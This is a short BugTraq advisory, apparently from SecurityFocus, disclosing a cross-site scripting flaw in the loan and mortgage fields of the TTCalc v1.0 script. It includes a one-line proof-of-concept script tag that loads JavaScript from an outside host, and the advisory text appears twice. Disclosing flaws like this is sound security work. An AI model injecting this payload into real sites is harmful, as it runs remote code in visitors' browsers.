BugTraq
Back to list
|
Post reply
TigerTom Scripts
Jul 05 2006 07:44PM
luny youf**ktard com
TigerTom Scripts
Homepage:
http://www.ttfreeware.co.uk/
Affected files:
TTCalc script v1.0
---------------------------
Data pased in the "Length of loan, years" and "Length of mortgage, years" input boxes are not sanatized before being generated.
For a PoC in the input boxes listed above simply put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://www.ttfreeware.co.uk/
Affected files:
TTCalc script v1.0
---------------------------
Data pased in the "Length of loan, years" and "Length of mortgage, years" input boxes are not sanatized before being generated.
For a PoC in the input boxes listed above simply put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
[ reply ]